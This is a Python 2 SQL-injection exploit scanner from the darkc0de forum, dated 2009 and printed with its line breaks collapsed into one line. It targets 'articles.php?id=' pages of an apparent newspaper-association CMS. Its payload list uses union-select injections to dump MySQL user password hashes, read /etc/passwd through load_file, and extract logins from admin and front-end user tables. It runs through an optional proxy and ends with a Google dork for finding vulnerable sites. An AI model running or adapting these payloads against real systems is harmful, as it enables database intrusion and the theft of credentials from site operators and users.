wan-sql.py.txt
Posted on 10 January 2009
#!/usr/bin/python # This was written for educational purpose only. Use it at your own risk. # Author will be not responsible for any damage! # !!! Special greetz for my friend sinner_01 !!! # !!! Special thanx for d3hydr8 and rsauron who inspired me !!! # ################################################################ # .___ __ _______ .___ # # __| _/____ _______| | __ ____ _ __| _/____ # # / __ |\__ \_ __ |/ // ___/ /_ / __ |/ __ # # / /_/ | / __ | | / < \___ \_/ / /_/ ___/ # # \____ |(______/__| |__|_ \_____>\_____ /\_____|\____ # # / / / # # ___________ ______ _ __ # # _/ ___\_ __ \_/ __ / / / # # \___| | / ___/ / # # \___ >__| \___ >/\_/ # # est.2007 / / forum.darkc0de.com # ################################################################ # --- d3hydr8 - rsauron - P47r1ck - r45c4l - C1c4Tr1Z - bennu # # --- QKrun1x - skillfaker - Croathack - Optyx - Nuclear # # --- Eliminator and to all members of darkc0de and ljuska.org# # ################################################################ import sys, os, time, re, urllib2, httplib, socket if sys.platform == 'linux' or sys.platform == 'linux2': clearing = 'clear' else: clearing = 'cls' os.system(clearing) proxy = "None" count = 0 if len(sys.argv) < 2 or len(sys.argv) > 4: print " |---------------------------------------------------------------|" print "| b4ltazar[@]gmail[dot]com |" print "| 01/2009 World Association of Newspapers |" print "| Help: wan.py -h |" print "| Visit www.darkc0de.com and www.ljuska.org |" print "|---------------------------------------------------------------| " sys.exit(1) for arg in sys.argv: if arg == '-h': print " |-------------------------------------------------------------------------------|" print "| b4ltazar[@]gmail[dot]com |" print "| 01/2009 World Association of Newspapers |" print "| Usage: wan.py www.site.com |" print "| Example: wan.py www.beijing2008conference.com |" print "| Visit www.darkc0de.com and www.ljuska.org |" print "|-------------------------------------------------------------------------------| " sys.exit(1) elif arg == '-p': proxy = sys.argv[count+1] count += 1 site = sys.argv[1] if site[:4] != "http": site = "http://"+site if site[-1] != "/": site = site+"/" vulnsql = ["articles.php?id=38+and+1=2+union+all+select+concat_ws(char(58),user,password,0x62616c74617a6172),1,2,3,4,5,6+from+mysql.user--","articles.php?id=26+and+1=2+union+all+select+load_file(0x2f6574632f706173737764),0x62616c74617a6172,2,3,4,5,6--","articles.php?id=26+and+1=2+union+all+select+0,concat_ws(char(58),buser_login,buser_passwd,0x62616c74617a6172),2,3,4,5,6+from+Back_users--","articles.php?id=26+and+1=2+union+all+select+0,concat_ws(char(58),fuser_login,fuser_passwd,0x62616c74617a6172),2,3,4,5,6+from+Front_users--"] print " |---------------------------------------------------------------|" print "| b4ltazar[@]gmail[dot]com |" print "| 01/2009 World Association of Newspapers |" print "| Visit www.darkc0de.com and www.ljuska.org |" print "|---------------------------------------------------------------| " print " [-] %s" % time.strftime("%X") socket.setdefaulttimeout(20) try: if proxy != "None": print "[+] Proxy:",proxy print " [+] Testing Proxy..." pr = httplib.HTTPConnection(proxy) pr.connect() proxy_handler = urllib2.ProxyHandler({'http': 'http://'+proxy+'/'}) proxyfier = urllib2.build_opener(proxy_handler) proxyfier.open("http://www.google.com") print print " [!] w00t!,w00t! Proxy: "+proxy+" Working" print else: print "[-] Proxy not given" print proxy_handler = "" except(socket.timeout): print print " [-] Proxy Timed Out" print sys.exit(1) except(),msg: print msg print " [-] Proxy Failed" print sys.exit(1) try: url = "http://antionline.com/tools-and-toys/ip-locate/index.php?address=" except(IndexError): print "[-] Wtf?" proxyfier = urllib2.build_opener(proxy_handler) proxy_check = proxyfier.open(url).readlines() for line in proxy_check: if re.search("<br><br>", line): line = line.replace("</b>","").replace('<br>',"").replace('<b>',"") print " [!]",line," " print "[+] Target:",site print "[+]",len(vulnsql),"Vulns loaded..." print "[+] Starting Scan.. " for sql in vulnsql: print "[+] Checking:",site+sql.replace(" ","") print try: source = proxyfier.open(site+sql.replace(" ", "")).read() search = re.findall("baltazar",source) if len(search) > 0: print "[!] w00t!w00t" ,site+sql.replace(" ", "") print except(KeyboardInterrupt, SystemExit): raise except: pass print print print print " Dork : inurl:/articles.php?id= intext:WAN" print print "Check for more details: http://packetstormsecurity.org/0809-exploits/wan-sql.txt" print " [-] %s" % time.strftime("%X")
